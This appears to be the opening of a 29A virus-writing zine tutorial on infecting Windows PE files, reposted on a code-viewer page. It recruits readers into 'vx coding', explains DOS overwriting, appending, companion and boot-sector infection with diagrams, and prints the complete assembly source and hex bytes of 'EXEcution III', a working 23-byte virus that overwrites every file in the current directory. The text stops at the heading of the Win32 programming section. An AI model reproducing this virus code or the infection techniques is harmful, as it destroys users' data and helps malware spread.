📄 29a-7.023
字号:
==========================================
=== PE INFECTION TUTORIAL FOR BEGINNER ===
==========================================
ART #1 : FIRST WORDS
ART #2 : VIEW OF THE PAST
ART #3 : YOUR FIRST PROGRAMM IN WIN32
ART #4 : PE FILE FORMAT
ART #5 : ACCESSING WIN32 API
ART #6 : HOW TO USE SOME APIS
ART #7 : DELTA OFFSET
ART #8 : RETURN TO THE HOST
ART #9 : TIPS n' TRICKS
CODE SECTION WRITEABLE
REDUCE YOUR CODE
COMPRESSED PE FILE
=============================================================
+ ________ +
+ /\ |---\ | | | /| +
+ / \ | | | --+----+-- / | +
+ / \ |___/ | | | / | +
+ /------\ | \ | --+----+-- | +
+ / \ | \ | | | | +
+ +
=============================================================
FIRST WORDS
So you want to code your own WIN32 virus ! ! ! If you are not stupid, if you
are patient and if you want really to do it then you can write a WIN32 virus
in asm language..... But first you should answer to this stupid question:
WHY DO YOU WANT TO DO IT !!!!?
- To destroy files?
- To kill all the BIOS of the universe?
- To fuck Micro$oft OS?
- Because it's only a chanlenge for you?
- To claim to the world a message of peace?
If you choose one of the three first answer, then you should phone to a
psychiatric therapist ! ! ! ! ! But if you want to claim a message of peace
then you are welcome in vx coding world...
Writing a virus is forbidden, so you should be prudent, and you had better
not to ask stupid questions. See law texts about informatics.
What you should have:
-A brain. (Logical and equipped with the option "English language")
-A computer.
-Patience.
-A linker (TASM, NASM, MASM...) and his Doc. I prefer NASM ....
(with NASM you can code for UNIX n' WIN32 platform, NASM is open
source!!!) (MASM means 'Micro$oft ASM'...no comment...)
-An asm file editor (of course you can only use NOTEPAD...)
but see QEDITOR.EXE in MASM pack
-A good hex editor (WINHEX)
What you should find:
-Tutorials for the asm language if you have no knowledge about it.
-Virus tutorials and Vx zines:
Download -40Hex zines : Old zines (a lot article for DOS)
-29A zines : Very very interesting zines.
-SLAM zines : essentially for macro virus.
-Vx tazy zine : A very cool zine. Thanks dear Lord Julus
-Vdat : Big collection of vx article. By Cicatrix
-...
-...
-Documentation about file format (EXE PE, see PECOFF.DOC from micro$oft).
-Doc about how to use WIN32 APIs (WIN32.HLP).
You should read all you will find about vx coding, read, read and read....
=============================================================
+ ________ __ +
+ /\ |---\ | | | / \ +
+ / \ | | | --+----+-- / | +
+ / \ |___/ | | | / +
+ /------\ | \ | --+----+-- / +
+ / \ | \ | | | /___ +
+ +
=============================================================
A VIEW OF THE PAST
Here I will speak about the old DOS viruses:
DOS IS DEAD !!! I loved DOS because it was my first OS on an old 186 with
an 'Hercules' graphic card ;-)
Writing a simple DOS virus is very, very, very easy...I've learn vx coding with
some old tutorials (40 hex...)
Common target files for viruses:
- *.COM
- *.EXE
- *.SYS
- *.DOC
- *.ZIP *.ARJ *.ARC ,all compressed archive files.
- *.OBJ *.ASM ;-)
Methods of infection:
* overwriting
* non-overwriting (appending)
* companion
* BOOT infector
OVERWRITTING VIRUS(*.COM infector):
They were very destructive because they copy themselves over the host and the
infected file will never run anymore:
Before infection After infection
+---------------+ +---------------+
| F F F F F F | | V I R U S |
| I I I I I I | +---------------+
| L L L L L L | | L L L L L L |
| E E E E E E | | E E E E E E |
+---------------+ +---------------+
NON-OVERWRITTING VIRUS (*.COM infector only):
This virus don't destroy the infected file, so he can spread as he want.
Before infection After infection
+---------------+ ---->-- +---------------+ <-- +---------------+
| F F F F F F | | --<-| JMP to VIRUS | <-- | F F F F F F |
| I I I I I I | | | | | <-- | I I I I I I |
| L L L L L L | | | +---------------+ +---------------+
| E E E E E E | | | | L L L L L L | |
+---------------+ | | | E E E E E E | |
| | +---------------+ |
| -->-| INFECT FILES | |
| +---------------+ |
| | RESTORE THE | |
| | FIRST OVER- |--->-------/
| | WRITED BYTES |
| +---------------+
----<---|JMP to the host|
+---------------+
The virus copy himself to the end of the host and overwrite the first bytes
by writing an JMP op code to the virus, infect others files, restore the
first overwritten bytes, and jmp to the host (beginning of the file)...
COMPANION VIRUS:
We found some companion viruses code in WIN32 but they appeared under DOS:
- When you tape c:\my_prog
-DOS search first for c:\my_prog.COM
-DOS search next for c:\my_prog.EXE if c:\my_prog.COM is not found
-DOS search next for c:\my_prog.BAT if c:\my_prog.EXE is not found
-DOS print on screen "file not found if c:\my_prog.BAT is not found
-So the companion virus search for my_prog.EXE, if present so it create a
my_prog.COM, copy himself on my_prog.COM
So after infection if you tape c:\my_prog then my_prog.COM (the virus)
is run first and the virus run my_prog.EXE ...CLEAR ?
BOOT infector:
These virus infect the Master boot of a floppy or an hard drive. They were
powerful because the virus run before the Operating System. Writing an
BOOT virus is not so easy in WIN32 because we are under the protected mode
I will now show you a very tiny overwriting virus(.COM infetor):
;--------------------------------------------------------------------
; The EXEcution III Virus.
;
; Well, you're now the prouw owner of the smallest virus ever made!
; only 23 bytes long and ofcourse again very lame..
; But what the heck, it's just an educational piece of code!!
;
; (C) 1993 by [D郣kR郰] of TridenT (Ooooooranje Boooooooven!)
;
; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his
; nice try to make the smallest (27 bytes and 25 bytes) virus... gotcha!! ;-))
;
; BTW Don't forget, I only tested it unter DOS 5.0 so on other versions
; it might not work!
_CODE SEGMENT
ASSUME CS:_CODE
ORG 100h
START: ; That's where we're starting...
FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH
MOV AH,4Eh ; Let's search!
DO_IT: MOV DX,SI ; Make DX = 100h (offset file)
INT 21h ; Search now dude!
MOV AX,3D01h ; Hmm, infect that fucking file!
MOV DX,9Eh ; Name is at DS:[9Eh]
INT 21h ; Go do it!
XCHG BX,AX ; Put the handle in BX
MOV AH,40h ; Write myself!
JMP DO_IT ; Use other routine
_CODE ENDS
END START
; If you don't like my english: Get lost, you can understand it!
;-------------------------------------------------------------------------
This virus overwrite all file (*.*) he find in the current directory only.
He looks like:
2A 2E 2A 00 B4 4E 8B D6 CD 21 B8 01 3D BA 9E 00 CD 21 93 B4 40 EB EF
very tiny, is'nt it?
It was a challenge under DOS to code the smallest virus...strange game !
=============================================================
+ ________ ___ +
+ /\ |---\ | | | / \ +
+ / \ | | | --+----+-- / | +
+ / \ |___/ | | | __/ +
+ /------\ | \ | --+----+-- \ +
+ / \ | \ | | | \ | +
+ \___/ +
=============================================================
YOUR FIRST WIN32 PROGRAMM
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -